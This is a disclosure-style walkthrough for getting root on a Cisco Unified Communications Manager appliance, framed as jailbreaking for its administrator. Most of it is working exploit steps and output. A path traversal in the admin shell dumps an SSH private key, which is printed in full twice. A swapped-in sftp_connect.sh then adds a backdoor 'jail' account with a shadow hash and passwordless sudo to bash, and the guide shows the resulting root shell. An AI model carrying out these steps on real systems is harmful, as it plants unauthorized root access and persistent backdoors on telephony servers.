Gaining access to closed phone platforms in order to execute the rights the paying customer actually has on the device has become a necessary exercise lately. Very capable people perform this public service for certain consumer devices on the market. Unfortunately, the trend of sealing the operating system off from the legitimate administrator has found its way into enterprise phone solutions as well. Therefore, it becomes necessary to provide jail-breaking guides for those platforms as well, in order to allow the administrator to fix or adjust things on these platforms that the vendor did not implement to the customer's satisfaction.
The Cisco Unified Communication Manager, or CUCM, is such a closed platform. While the system's design separates the administration user of the web interface, which controls the VoIP specific functionality, from the operating system administrator, the later is confined in an IOS-like command line shell written in Java. This shell only offers a very small set of commands, barely sufficient to manage the appliance's functionality. The underlying operating system, a Red Hat Enterprise Linux AS release 4 (Nahant Update 4) in the case of CUCM 7.x, obviously offers a significantly broader spectrum of setup and administration choices. For example, it might be desirable to modify the iptables configuration in order to protect some of Cisco's less well implemented services from the casual attacker.
WARNING: The following information is provided as-is, for educational purposes only. Using this information against actual Cisco products may void your warranty, may not be legal and may cause you trouble and other unwanted effects. We neither recommend nor encourage any activity that is not compliant with laws and license agreements you may have. This guide is only provided for testing in lab environments.
So, without further ado, here we present one way to gain root access on a CUCM, provided a legitimate operating system administrator account is available:
admin:file dump sftpdetails ../.ssh/id_dsa -----BEGIN DSA PRIVATE KEY----- MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl 6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO +6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ 5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE PSfhcQWR3rOKaYUD85henvE= -----END DSA PRIVATE KEY-----
C:\>copy con c:\temp\id.ots -----BEGIN DSA PRIVATE KEY----- MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl 6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO +6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ 5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE PSfhcQWR3rOKaYUD85henvE= -----END DSA PRIVATE KEY----- ^Z 1 file(s) copied.
C:\>puttygen c:\TEMP\id.otsSave the private key (with or without passphrase) to another file, e.g. c:\temp\id.ppk.
C:\>psftp -2 -i c:\TEMP\id.ppk sftpuser@cucm.example.com Using username "sftpuser". Remote working directory is /home/sftpuser psftp>
psftp> get sftp_connect.sh remote:/home/sftpuser/sftp_connect.sh => local:sftp_connect.sh psftp> exit
chattr -i /etc/passwd chattr -i /etc/shadow echo 'jail:x:1337:1337::/tmp:/bin/bash' >> /etc/passwd echo 'jail:$1$knkuI5HP$sNn3SJJ/95E.9iD.vvnyw.:14714:1:99999:7:::' >> /etc/shadow echo 'jail ALL=(root) NOPASSWD: /bin/bash' >> /etc/sudoers chattr +i /etc/passwd chattr +i /etc/shadow
C:\TEMP\>psftp -2 -i c:\TEMP\id.ppk sftpuser@cucm.example.com Using username "sftpuser". Remote working directory is /home/sftpuser psftp> del sftp_connect.sh rm /home/sftpuser/sftp_connect.sh: OK psftp> put sftp_connect.sh local:sftp_connect.sh => remote:/home/sftpuser/sftp_connect.sh psftp> chmod 555 sftp_connect.sh /home/sftpuser/sftp_connect.sh: 0644 -> 0555 psftp> exit
admin:file get tftp os7920.txt Please wait while the system is gathering files info ...done. Sub-directories were not traversed. Number of files affected: 1 Total size in Bytes: 22 Total size in Kbytes: 0.021484375 Would you like to proceed [y/n]? y SFTP server IP: doesNotMatter SFTP server port [22]: User ID: SoonToBeRoot Password: *** Download directory: InYourFace Could not connect to host doesNotMatter on port 22. Please verify SFTP settings. admin:
login as: jail jail@cucm.example.com's password: -bash-3.00$ sudo /bin/bash bash-3.00# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) bash-3.00#
This procedure was brought to you by Sandro Gauci of EnableSecurity and Felix 'FX' Lindner of Recurity Labs.